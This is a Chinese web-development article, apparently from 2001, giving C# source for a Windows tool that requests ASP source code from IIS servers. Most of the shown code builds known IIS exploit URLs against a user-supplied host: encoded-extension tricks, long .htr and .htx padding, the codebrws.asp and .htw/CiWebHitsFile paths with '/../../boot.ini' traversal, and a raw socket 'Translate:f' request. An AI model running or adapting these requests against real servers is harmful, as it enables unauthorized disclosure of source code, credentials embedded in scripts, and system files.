WEB开发网
开发学院WEB开发ASP 一个用c#写的扫描asp源码漏洞的应用程序(续) 阅读

一个用c#写的扫描asp源码漏洞的应用程序(续)

 2001-01-16 10:56:22 来源:WEB开发网   
核心提示://主要方法PRotected void btnGo_Click (object sender, System.EventArgs e){//解析urlstring strServer = this.txtServer.Text ;string strUrl = this.txtFileName.Text ;char
//主要方法
    PRotected void btnGo_Click (object sender, System.EventArgs e)
    {

      //解析url
      string strServer = this.txtServer.Text ;
      string strUrl  = this.txtFileName.Text ;
      char [] point = {'.'} ;  //定义分割符为"."
      char[] line = {'/'} ;   //定义分割符为"."
      string [] arrString = strUrl.Split(line) ;

      //求asp文件全名
      string strFileName = arrString[arrString.Length - 1] ;
      //求从根目录下的路径
      string strPath = strUrl.Substring( 0 ,
               strUrl.Length - strFileName.Length) ;

      //解析文件全名
      arrString = strFileName.Split(point) ;
      //求文件扩展名
      string strLast = arrString[arrString.Length - 1] ;
      //求文件名
      string strFirst = strFileName.Substring( 0 ,
               strFileName.Length - strLast.Length - 1) ;
      


      //使按钮、输入框等失效
      this.txtServer.ReadOnly = true ;
      this.txtFileName.ReadOnly = true ;
      this.btnClear.Enabled = false ;
      this.btnGo.Enabled = false ;


      if (this.txtServer.Text == "http://" || this.txtFileName.Text == ""
        || this.txtServer.Text.Trim()== "" ||
        this.txtServer.Text.Substring(0,7) != "http://")
      {
        MessageBox.Show("请输入正确的主机名和文件名!") ;
        this.txtServer.Focus() ;
      }
      else
      {
        this.txtResult.Visible = true ;
        this.txtResult.ReadOnly = true ;
        this.barStatus.Text = "正在连结主机…" ;

        string strRequestFile ;

        switch (this.cboMethod.SelectedIndex)
        {
          case 0:     //直接读取
            strRequestFile = strServer + strUrl ;
            break ;
          case 5 :     //%2e%41sp
            strRequestFile = strServer + strPath + strFirst
                    + "%2e%41sp" ;
            break ;
          case 8 :    //longhtr
            strRequestFile = strServer + strUrl
               + "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
               + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
               + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
               + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
               + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
               + "%20%20%20%20%20%20%20%20"
               + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
               + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
               + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
               + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
               + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
               + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
               + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
               + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;
            break ;

          case 10:   //codebrws.asp
            strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
                    + strUrl ;
            break ;

          case 11:  //showcode.asp
            strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
                    + "/msadc/../../../../boot.ini" ;
            break;

          case 12 : //null.htw
            strRequestFile = strServer + "/null.htw?CiWebHitsFile="
                    + strUrl + "%20&CiRestriction=none&CiHiliteType=Full" ;
            break ;
          case 13 : //qfullhit.htw
            strRequestFile = strServer + "/iissamples/issamples/oop/qfullhit.htw?"
                    + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                    + "&CiHiliteType=Full";
            break ;

          case 14 : //qsumrhit.htw
            strRequestFile = strServer + "/iissamples/issamples/oop/qsumrhit.htw?"
                    + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                    + "&CiHiliteType=Full";
            break ;

          case 15 : //query.idq
            strRequestFile = strServer + "/query.idq?CiTemplate=/../../boot.ini"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                    + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htx";
            break ;

          case 16:  //search/qfullhit.htw
            strRequestFile = strServer + "/iissamples/exair/search/qfullhit.htw?"
                    + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                    + "&CiHiliteType=Full";
            break ;

          case 17:  // search/qsumrhit.htw
            strRequestFile = strServer + "/iissamples/exair/search/qsumrhit.htw?"
                    + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                    + "&CiHiliteType=Full";
            break ;
          
          case 18:  //iirturnh.htw
            strRequestFile = strServer + "/iishelp/iis/misc/iirturnh.htw?"
                    + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                    + "&CiHiliteType=Full";
            break ;

          case 19: //.htw
            strRequestFile = strServer + strUrl
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                    + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                    + "%20%20%20%20%20%20%20%20%20%20%20.htw?"
                    + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                    + "&CiHiliteType=Full" ;
            break ;

          default:
            strRequestFile = strServer + strUrl + this.cboMethod.Text ;
        }
        
        this.barStatus.Text = "发送请求:"
                   + (strRequestFile.Length >= 50 ?
                    strRequestFile.Substring(0 , 50)
                    :strRequestFile)
                   + "...";

        string strResult ;
        //如果不是translate:f方法则可以直接发送http请求
        if (this.cboMethod.SelectedIndex != 20)
        {
          //直接发送http请求
          strResult = Get_Http(strRequestFile) ;

          this.barStatus.Text += "完成。" ;
          strResult = strResult == "" ? "未找到!" : strResult ;
          this.txtResult.Text = strResult ;
        }
        else //translate:f方法需要建立tcp/ip连接
        {
          string strRequest = "GET " + strServer + strUrl
                    + "\r\nHTTP/1.0\r\nTranslate:f\r\n" ;
          strResult = Get_Socket_Request(strServer , strRequest , 80) ;
          this.barStatus.Text += "完成。" ;
          strResult = strResult == "" ? "未找到!" : strResult ;
          this.txtResult.Text = strResult ;

        }
      
      }

      //使按钮、输入款等恢复
      this.txtServer.ReadOnly = false ;
      this.txtFileName.ReadOnly = false ;
      this.btnClear.Enabled = true ;
      this.btnGo.Enabled = true ;


    }


    //通过同server建立tcp/ip连接,发送socket命令
    private string Get_Socket_Request(string a_strServer , string a_strRequest , Int32 a_intPort)
    {
      //Set up variables and String to write to the server
      Encoding ASCII = Encoding.Default ;
      string Get = a_strRequest + "Connection: Close\r\n\r\n";
      //string Get =
      Byte[] ByteGet = ASCII.GetBytes(Get);
      Byte[] RecvBytes = new Byte[256];
      String strRetPage = null;

      // IPAddress and IPEndPoint represent the endpoint that will
      //  receive the request
      IPAddress hostadd = DNS.Resolve(a_strServer.Substring(7 ,a_strServer.Length - 7));
      IPEndPoint EPhost = new IPEndPoint(hostadd, a_intPort);

      //Create the Socket for sending data over TCP
      Socket s = new Socket(AddressFamily.AfINet, SocketType.SockStream,
                  ProtocolType.ProtTCP );

      // Connect to host using IPEndPoint
      if (s.Connect(EPhost) != 0)
      {
        strRetPage = "Unable to connect to host";
        return strRetPage;
      }

      // Sent the GET text to the host
      s.Send(ByteGet, ByteGet.Length, 0);

      // Receive the page, loop until all bytes are received
      Int32 bytes = s.Receive(RecvBytes, RecvBytes.Length, 0);
      strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);

      while (bytes > 0)
      {
        bytes = s.Receive(RecvBytes, RecvBytes.Length, 0);
        strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
      }

      return strRetPage ;
    }

    //获取http页面函数
    private string Get_Http(string a_strUrl)
    {
      string strResult ;
      HttpWebRequest myReq = (HttpWebRequest)
                  WebRequestFactory.Create(a_strUrl) ;

      try
      {
        HttpWebResponse HttpWResp = (HttpWebResponse)myReq.GetResponse();
        Stream myStream = HttpWResp.GetResponseStream () ;

        StreamReader sr = new StreamReader(myStream , Encoding.Default);
        StringBuilder strBuilder = new StringBuilder();
        while (-1 != sr.Peek())
        {
          strBuilder.Append(sr.ReadLine()+"\r\n");
        }
        
        strResult = strBuilder.ToString();
      }
      catch(Exception exp)
      {
         strResult = "错误:" + exp.Message ;
      }

      return strResult ;
      
    }

    //退出
    protected void mnuExit_Click (object sender, System.EventArgs e)
    {
      
      if (MessageBox.Show("真的退出吗?" , "退出系统" , MessageBox.YesNo) == DialogResult.Yes)
      {
        this.Close () ;

      }
    }


    //主函数
    public static void Main(string[] args)
    {
      application.Run(new Form1());
    }
  }
}

Tags:一个 扫描 asp

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接